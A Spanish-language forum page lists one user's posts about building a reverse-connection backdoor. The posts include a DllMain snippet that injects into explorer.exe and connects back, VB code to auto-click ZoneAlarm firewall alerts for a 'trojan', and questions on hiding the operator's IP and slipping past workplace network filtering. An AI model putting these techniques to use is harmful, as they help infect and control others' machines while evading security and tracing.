Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Badlands

#1
Seguridad / Ocultacion IP en conexion inversa
30 Septiembre 2012, 15:12 PM
Hola a todos, estoy terminando de desarrollar un backdoor de conexión inversa y me surgió la siguiente duda. Supongamos que utilizo un dns tipo noIp para que el servidor se conecte a mi pc, ¿Pero no sigue siendo totalmente rastreable mi ip?. Esta duda me surgió leyendo el articulo de encadenamiento de proxies, enfoque que no creo poder utilizar para este tipo de conexión.
Las preguntas son las siguientes:

-¿Que tipo de técnica se utiliza para ocultar la ip en este caso?
-¿Con una IP, es posible rastrear una ubicación especifica?

Gracias, Saludos.
#2
Redes / Re: Consulta seguridad empresas
30 Septiembre 2011, 19:56 PM
gracias, voy a investigar un poco mas.

saludos.
#3
Redes / Consulta seguridad empresas
27 Septiembre 2011, 01:53 AM
Hola,

tengo la siguiente consulta. He desarrollado una aplicacion de conexión remota, servidor hecho en c y el cliente en c#. Aclaro que es de conexión inversa osea que el cliente recibe todas las conexiones. La aplicacion anda perfecto, pero estoy tratando de probarlo desde la empresa donde trabajo y no logro que se establesca dicha conexión. Aca es donde entra la pregunta hacia ustedes. Ya se que deben haber mil factores que esten impidiendo dicha conexión, lo que quisiera saber es que me orienten un poco en que tipo de tecnologias pueden estar usando para filtrar las conexiones indeseadas, se que existe la posibilidad de que utilicen algun proxy socks. Aunque en ese caso me gustaria saber como comprobar eso, no conozco iptables, pero supongo que tambien podrian estar utilizandolo. Solo quiero saber que tipo de arquitectura y tecnologias se suelen usar con respecto a la seguridad informatica en las empresas.

Gracias, Saludos
#4
Problema solucionado, Me faltaba agregar la instruccion "CallNextHookEx", eso era lo que colgaba la aplicacion, ahora me interesaria saber como hacer algo similiar para quitar el codigo en assebler utilizado en los otros metodos como el del trampolin.

Gracias, Saludos.
#5
Programación C/C++ / Dll Injection Freeze
30 Abril 2011, 06:10 AM
Hola, como les va.

Queria consultarle a ustedes un problema con el que me he encontrado.

Estoy haciendo una aplicacion de tipo cliente servidor. Cliente en vb.net y el server en c/c++. La comunicacion entre estos dos funciona perfecta cuando compilo el server en un ejecutable, pero lo que realmente quiero hacer es utilizarlo desde una dll, inyectando esta misma en el proceso explorer.exe. Probe todos los metodos explicados en el paper de mazard. La inyeccion se realiza exitosamente, el inconveniente es que: les muestro el main de mi aplicacion asi lo entienden mejor:

bool WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
Servidor * serv;
serv = new Servidor;
serv->Ip=const_cast<char *>(IP);
serv->Puerto=8000;
serv->Conectar();

while(serv->Conectado==false)
{
serv->Conectar();
}

return 0;
}


Si quito el while el proceso que tiene la dll (explorer.exe) injectada se cuelga y deja de funcionar, y debo reiniciarlo para que funcione nuevamente.

Realmente debo dejar ese while ya que es el que me asegura que cuando se empece a escuchar desde el cliente(conexión inversa) este se conecte automaticamente.

No se si alguno tuvo que enfrentar este problema alguna vez. Ralmente soy nuevo tanto en c/c++ y mas aun con el tema de dll injection.

PD: Probe con todos los tipos de inyeccion y con todos me ocurre los mismo, y al quitar ese while, no se cuelga.
Quizas exista alguna forma de realizar que el server intente conectase al realizarse en la escucha del puerto.

Gracias, Saludos.

EI: juntando mensajes.

Sigo probando con mi codigo y me di cuenta que, el while no es, ya que cuando se establece la conexión entre el cliente y el servidor el proceso al que le inyecte la dll se sigue colgando. Pregunta? Es normal que se cuelgue un proceso al realizar una inyeccion dll o es algo en mi codigo que debe estar probocando esto.

Gracias, Saludos.
#6
Programación Visual Basic / Re: Mouse¡¡¡¡
22 Diciembre 2006, 20:01 PM
Sisi pasame tu msn por pm o si no agregame vos yo lo tengo publico el msn.  ;D
#7
Programación Visual Basic / Re: Mouse¡¡¡¡
21 Diciembre 2006, 19:26 PM
AJAJAJAJ posta que si era mi ultima esperanza de saltarme es firewall y los de su calaña, me parece que voy a tener que tirar mi troyano recien salido del horno a la basura, ya no se que inventar.
Se te ocurre algo?
#8
Programación Visual Basic / Re: Mouse¡¡¡¡
21 Diciembre 2006, 19:03 PM
Justamente vengo de ahi y me parece que ese codigo no funciona pero no importa ya lo resolvi de otra manera, pero esto lo quiero hacer para darle permitir al zone alarm cuando salta la alerta de seguridad, y puedo hacer click en todos lados menos en el formulario de zone alarm a alguien le paso esto?
#9
Programación Visual Basic / Mouse¡¡¡¡
21 Diciembre 2006, 16:07 PM
El programa que estoy tratando de hacer es muy sencillo se trata de mover el mouse y hacer click en determinada coordenada, el mouse lo mueve pero no me hace click. En esa coordenada puse el icono de mi pc para que haga doble click pero no lo hace alguno save por que les dejo el codigo:

Modulo:

Public Declare Function SetCursorPos Lib "user32.dll" (ByVal x As Long, ByVal y As Long) As Long
Public Declare Sub mouse_event Lib "user32.dll" (ByVal dwFlags As Long, ByVal dx As Long, ByVal dy As Long, ByVal cButtons As Long, ByVal dwExtraInfo As Long)

Const MOUSEEVENTF_ABSOLUTE = &H8000
Const MOUSEEVENTF_LEFTDOWN = &H2
Const MOUSEEVENTF_LEFTUP = &H4
Const MOUSEEVENTF_MIDDLEDOWN = &H20
Const MOUSEEVENTF_MIDDLEUP = &H40
Const MOUSEEVENTF_MOVE = &H1
Const MOUSEEVENTF_RIGHTDOWN = &H8
Const MOUSEEVENTF_RIGHTUP = &H10
Const MOUSEEVENTF_WHEEL = &H80
Const MOUSEEVENTF_XDOWN = &H100
Const MOUSEEVENTF_XUP = &H200
Const WHEEL_DELTA = 120
Const XBUTTON1 = &H1
Const XBUTTON2 = &H2


Form:

Private Sub Command1_Click()
SetCursorPos "510", "480"
mouse_event MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0
mouse_event MOUSEEVENTF_LEFTUP, 0, 0, 0, 0
mouse_event MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0
mouse_event MOUSEEVENTF_LEFTUP, 0, 0, 0, 0
End Sub
#10
Como? No te entiendo me podrias poner un ejemplo. Por lo que entiendo tendria que poner en el progressbar en vez de los datos que van llegando los que van saliendo. Nose si me explico yo el progressbar lo quiero en el cliente no en el server.

Gracias